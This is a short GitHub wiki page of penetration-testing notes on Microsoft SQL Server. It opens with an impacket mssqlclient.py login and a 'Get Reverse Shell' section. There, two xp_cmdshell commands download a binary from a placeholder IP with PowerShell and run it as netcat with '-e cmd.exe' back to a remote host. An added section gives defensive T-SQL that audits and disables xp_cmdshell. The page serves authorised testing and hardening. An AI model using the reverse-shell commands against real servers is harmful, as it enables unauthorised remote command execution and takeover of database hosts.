MSSQL - CraigDonkin/Infrastructure GitHub Wiki
MSSQL
mssqlclient.py
- From impacket
mssqlclient.py user@server -db dbname -windows-auth
Get Reverse Shell (requires xp_cmdshell to be enabled)
SQL> EXEC xp_cmdshell 'powershell.exe Invoke-WebRequest -o nc.exe http://xx.xx.xx.xx/file.exe'
SQL> EXEC xp_cmdshell 'file.exe -e cmd.exe xxx.xxx.xxx.xxx xxxx'
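Both commands above depend on xp_cmdshell being enabled on the instance. The T-SQL below is an added example, not part of the original wiki: it audits whether xp_cmdshell is on, who could turn it on or run it, and then disables it. It assumes you run it as a sysadmin on the instance under review.

```sql
-- Added example (not from the original page): audit and disable xp_cmdshell.

-- 1. Is xp_cmdshell enabled? 'configured' is the stored value, 'running' the active one.
SELECT name,
       CAST(value AS int)        AS configured,
       CAST(value_in_use AS int) AS running
FROM sys.configurations
WHERE name IN (N'xp_cmdshell', N'show advanced options');

-- 2. Logins in sysadmin: these can run xp_cmdshell and can re-enable it.
SELECT p.name, p.type_desc, p.is_disabled
FROM sys.server_principals AS p
WHERE p.type IN ('S', 'U', 'G')
  AND IS_SRVROLEMEMBER('sysadmin', p.name) = 1;

-- 3. Principals that can change server settings without being sysadmin.
SELECT pr.name, pe.permission_name, pe.state_desc
FROM sys.server_permissions AS pe
JOIN sys.server_principals  AS pr
  ON pr.principal_id = pe.grantee_principal_id
WHERE pe.permission_name IN (N'ALTER SETTINGS', N'CONTROL SERVER')
  AND pe.state IN ('G', 'W');

-- 4. Explicit EXECUTE grants on xp_cmdshell to non-sysadmin users (stored in master).
USE master;
SELECT dp.name, pe.permission_name, pe.state_desc
FROM sys.database_permissions AS pe
JOIN sys.database_principals  AS dp
  ON dp.principal_id = pe.grantee_principal_id
WHERE pe.class = 1
  AND OBJECT_NAME(pe.major_id) = N'xp_cmdshell';

-- 5. Proxy credential that non-sysadmin callers of xp_cmdshell would run under.
SELECT name, credential_identity, create_date
FROM sys.credentials
WHERE name = N'##xp_cmdshell_proxy_account##';

-- 6. Disable xp_cmdshell and hide advanced options again.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Because any sysadmin can re-enable the option with sp_configure, the results of steps 2 and 3 matter as much as the setting itself.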